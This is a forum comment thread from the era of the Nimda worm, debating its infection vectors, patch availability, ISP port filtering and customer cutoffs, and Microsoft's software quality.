The other IIS exploit was really just to use holes which had been punched in from Code Red. This means that if CR had infected a machine, that machine would need to have been properly cleaned up.
The other vector this virus used was a problem with invalid interpretation of Mime headers, reported in MS01-020 in March of 2001. This was corrected with SP2 of both IE5.01 and IE5.5, as well as IE6.0.
Yes these exploits had been patched many months ago.
No you did not have to subscribe to anything to obtain these patches, they are all available for Free off of Microsoft's website.
http://www.microsoft.com/security
/. tends to have difficulty representing the truth. Personally I blame it on a shortage of anti-depressant medications in Michigan.
Or rather, 0.1% is the third or fourth attempt at copying "Hello World" out of "Java for Dummies", after 20 minutes of looking at (s, "s and ;s.
Eric
"Seven Deadly Sins? I thought it was a to-do list!"
I don't see what the fuss is all about, I patched my system when prompted to, I updated my Norton antivirus when prompted to, I've went on some websites which had the virus, It detected it, I've received e-mails with it, it detected it.
:)
I'm not a rocket scientist, I've acted like any Net user should do, patching and antivirus are something common in the windows world, bitch as much as you want, if you've done you're homework properly, chances are you didn't get affected by this. Of COURSE some will (people that got it before let's say the Norton update was available), but if everybody would have done his job right, the threat would have been contained and not as big as it is right now.
Paying for norton antivirus? well last time I checked it was about 30$ for an OEM copy, that's nothing compared to paying 40$ for a C00l K-RaD cooler or overpriced pentium IV is it? If you're able to spend 1000$ on a box, spending 30$ for protecting it is an investment.
What I find unacceptable is people that, one week after code red was announced, were still infected and probing my servers. That's irresponsible, and I agree with shutting them down until they fix the problem. Please don't bullshit with freedom and similar crap related issues, if your freedom means slowing down or crashing other people's net experience, it's called BEING SELF-CENTERED and irresponsible. ISP have a responsibility to ensure that the maximum of their userbase aren't affected by any crisis, a complete shutdown may be a bit drastic, but if it's the way to educate people (since it seems that people didn't learn from code red) well, I'm all for it.
I guess I'll be modded as a troll or flamebait, but I do think I'm making sense
--- Metamoderating abusive downgraders since my 300th post.
I see NO difference here. They may not know why they can't connect. They call the ISP help line. The notes in the account indicate it was cut off for Nimba Infection.
"What do I do?"
"Take your computer to any of the dozens of computer repair/service/consultant places in your local phone book. Tell them you have a Nimba Infection and give them this phone number if they have questions."
There is a cost associated with running a computer, either you pay it with time learning how to run/configure/maintain it, or you pay it with dollars paying the consultant to take care of it for you.
DeanT
FYI IE 5.0 SP1 solved the problem.
I've tested on several machines here running 5.0 SP1 and they had no problems at all with the page.
If God gave us curiosity
From the Slashdot story, "... Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS."
I think this is exactly the problem. That's why Windows 2000 was reportedly shipped with 63,000 action items still unfinished. Microsoft knows that, once they deliver one good operating system, most people wiil never buy another. They want to make sure that they never finish the job.
Forcing users to pay for subscriptions would allow Microsoft to make money every year even if it did no more work on the OS. That seems to be the goal: money for nothing.
Microsoft is a very adversarial company, in my opinion. They are not good citizens.
A good partial resolution of the US DOJ vs. Microsoft antitrust case would be to prohibit secret file formats. Then there could be competition again. At present, if a big customer upgrades to a new version of Microsoft Office, and sends out files incompatible file with previous versions, all people who receive the files are forced to upgrade. Companies don't want to go to a good customer and ask them to re-send a docuemnt in a former format.
What Should be the Response to Violence?
Bush's education improvements were
True. But it shows a particular attitude, doesn't it? Ship on schedule, not when the product is finished.
Bush's education improvements were
My DSL ISP just filtered all incoming HTTP traffic to all their customers. My personal WWW server become unaccessible. My Linux box is NOT infected and I do not see why I have to suffer because they are trying to protect some stupid windows users. And this is "business" DSL account!
They can please the fifty percent of the people who want it when it was promised, or they can please the other fifty percent who want it 'when it's done.' Or they can pull an Ion STORM and live off of the hype for four full years, then sink within six months.
Vintage computer games and RPG books available. Email me if you're interested.
Relying on host features to prevent denial of service attacks is pointless
Relying on ANY single point of security is pointless.
ISPs need to pull their finger out, and start doing filters that prevent source address spoofing.
Nobody said they didn't. I did when I ran an ISP.
But until the laws of every country in the world mandate this, upon penalty of death, it's not going to happen.
Instead of convincing 200 countries to make a change, don't you think it'd be more productive to try to convince a handful of people to make a change that increases security somewhat on 95% of the PCs connected to the Internet? Especially IN ADDITION to convincing ISPs to do their jobs?
When I got my DSL line, I recieved a big hurkin box full of stuff. (Including a very nice Intel NIC.)
If they are concerned about how infected servers, they should work a deal with Linksys or some other manufacturer and ship a firewall box with each install.
They are very simple to set up and keep out the probes to all the ports that Windows leaves open. If people want to run web servers, they have to specifically enable specific ports.
It won't stop the e-mail viruses, but it is a start...
"Trademarks are the heraldry of the new feudalism."
We are clearly in a time when we are increasingly vulnerable. If we are not capable of stopping these types of attacks in their tracks, we can count on remaining vulnerable not just to the mafia boys of the world, but to nations and organizations who are deadly intent on causing as much destruction as possible.
1) ISPs should allow any and all traffic - they're just service providers. Great idea - and the highway system (ok, let's say toll roads) should let folks drive down them with an M1 Abrahams tank. Armed. Fact is, service providers must for both idealistic ethical and pragmatic financial reasons must choose the greater good of the majority of users - not the imagined rights of any individual to screw it up for everyone else.
2) Cutting users off from the Internet seems a bit harsh. Bull. Having suffered through the Code Red degradation of service, I can guarantee that is a trivial harshness that is necessary. I turned over my scan lists to @home and they politely replied that they were "notifying" the offenders. If these guys were in charge of quarantining an Ebola outbreak we'd all be barfing blood. Blanket port blocking, on the other hand, wrongly damages and restricts responsible users.
3) M$ "fixes" their problems. More pure bull. M$ historically doesn't "fix" problems - they deny, accuse the evil virus writers, then finally stick bandaids on gaping holes - after suggesting that the users employee unworkable workarounds. The real problems are deeply rooted in fundamental design flaws and cannot truly be fixed without a major overhaul - oh yeah, I guess that would be Windows ME.
If enough users who purchase and use defective software get blown off the internet, then maybe, just maybe we'll see fewer ignorant (not stupid - there's a difference) users blundering down the electronic highways in battle tanks just cause some slick salesman in Seattle told them tanks made great family cars.
> However you can only use Windows Update if you have a legally purchased copy of Windows...
Uhm, wrong. Perhaps that _might_ be the case with non-Corporate copies of Windows XP, but that's certainly not the case with any other version of Windows. If Windows is installed (and you require a CD Key to install it), then that's all you need.
For the past 48 hours my XO DSL (formerly concentric) has been blocking port 80 traffic. Originally all port 80 traffic was blocked, and on and off parts have been open, but now outbound is open. But my hosted sites here are down, and have been for nearly 48 hours. Here is a copy of the email I got from xo:
As a consequence of the increased traffic generated by NIMDA worm, XO will
continue to use filters for Internet traffic on some of our networks. We
will continue to monitor these filters and remove them from the network as
the traffic decreases. In addition, we will continue to investigate
alternative options to filter this traffic.
The filters we have recently implemented block the most common methods used
by the worm to spread via the UDP port 69 (used for TFTP or Trivial File
Transfer Protocol) and inbound TCP traffic on port 80 (used for HTTP or
Hyper Text Transfer Protocol). This filter set may prevent others from
accessing sites on your web servers. These filters will remain in place
until the attacks have been brought under control.
XO customers are encouraged to secure their systems. If the worm has
affected a machine on your network, it must be removed from the network and
reformatted. You can find more information on these attacks and available
remedies from the following links, using an alternate Internet connection if
necessary:
Note that even if I was never infected (I wasn't -- mainly I run FreeBSD, and my win32 machines were patched months ago), I have no option to have them turn it on by telling them I'm clean. I confirmed this on the phone, there's nothing I can do. I am going to call and bitch and make them refund part of my monthly fee. This is bullshit.
I can see blocking people who appear to be infected, but blocking everybody? Ick.
-Justin
Can you read?
The comment (indeed, the few comments previous in the thread) clearly referred to NT/2K SERVER, not workstation. Heck, I run W2K workstation at home...it is a fuckload more stable than anything in the 9x series.
And I don't run Linux on any of my boxes...OpenBSD and FreeBSD are much better suited to my needs for servers, routers, etc. For a desktop, W2K workstation has everything else beat currently, especially seeing as I like to play more than the select few games available on Linux.
"That's Tron. He fights for the Users."
When ISPs get into the habit of deciding what content is OK and what content isn't, we are getting into real trouble. And I think they may be exposing themselves to legal liability as well.
It's true what you said. But the 63,000 action items speaks something that I find true.
In my opinion, a rich company like Microsoft could do more to assure the quality of its products.
Microsoft Word 2000, for example, is VERY quirky. Also, even after all these versions, it still doesn't allow on-screen kerning. That's not a good record for a very expensive product of which Microsoft has sold millions of copies.
Bush's education improvements were
Though I agree with you in principle... I think outlawing web servers or other services is stupid...
If you are infected with NIMDA, then your computer, your connection, is attempting to break into hundreds or thousands of other computers from your connection. I'd shut you off as well; your computer is engaging in otherwise illegal behavior, whether you know about it or not.
If you know about it, then you are responsible.
If you don't, you should.
I think that all around, this is the most effective tactic that can be done.
It's fair - if you're not a problem, you don't get affected. If you are a problem, you're neutralized. No collateral damage.
It works for novice and techie alike - no matter what your experience level, you WILL notice your connection no longer works! And all customers know how to call in to support... and then they can get help at an appropriate skill level, along with some well-deserved admonishment.
It's effective - you don't leave people with really nasty infectious diseases out in the general population, you isolate them. You don't ignore the drunk driver, you slam the sucker in the drunk tank overnight. No, computers do not compare to real lives - but neither does losing your ability to websurf compare to losing your car for a year! In relative terms, it's about equivalent.
It also keeps the infected systems from attacking their neighbors - egress filtering, etc, won't do diddly at the local segment, and I can assure you the routers that cablemodems or DSL modems hook into do NOT have enough brains to act as firewalls as well.
There is indeed a problem with getting patches after... perhaps the best implementation of the cutoff would be to reassign their IP into a quarantine range, which can only access the ISP's fixit site (or other people in the quarantine range).
How you can prove you're properly patched, though, is a tough one. I removed several people from an email list I run because they had Sircam, and I simply had to trust them when they said they'd fixed their systems....
I agree with you completely on the age issue. If someone is going to put a computer on the Internet, it is incombent upon them to know something about how that computer and the Internet work. They don't have to have a technician's level of knowledge, but they do need to know enough to keep their machine working properly and to fix simple problems.
In many cases, the elderly person didn't get on the Net themselves; a younger person, often a son, daughter, grandson, or granddaughter, got them online. In that case, the person who set things up bears the responsibility of keeping things running smoothly, at least for a time. I can recall an incident at work where an elderly lady called a co-worker of mine with technical problems. Not only had she reached the wrong department, but in talking with her, he found that she thought that we were responsible for turning her computer on and off for her. She didn't have a clue that there was a button that she needed to push to turn it on. She explained that her kids had gotten the computer for her and set up an Internet account, but she said they never showed her how to use it. If anyone thinks this is uncommon, they should go to work for an ISP's tech support department for a week or two. Point is, whoever convinced these folks they need to be online needs to follow through with the proper training and support.
And I agree completely with the ISPs who are booting infected users. These computers are actively looking for other machines to infect, and they're degrading service for everyone else. As soon as the users patch their computers, they can get back online. As for losing connectivity before they can get the patch, well, they'll learn a little resourcefulness, and they'll learn not to put these things off next time. And if they can't or won't patch, then they don't need to be online in the first place.
That light you see at the end of the tunnel might be from an oncoming train.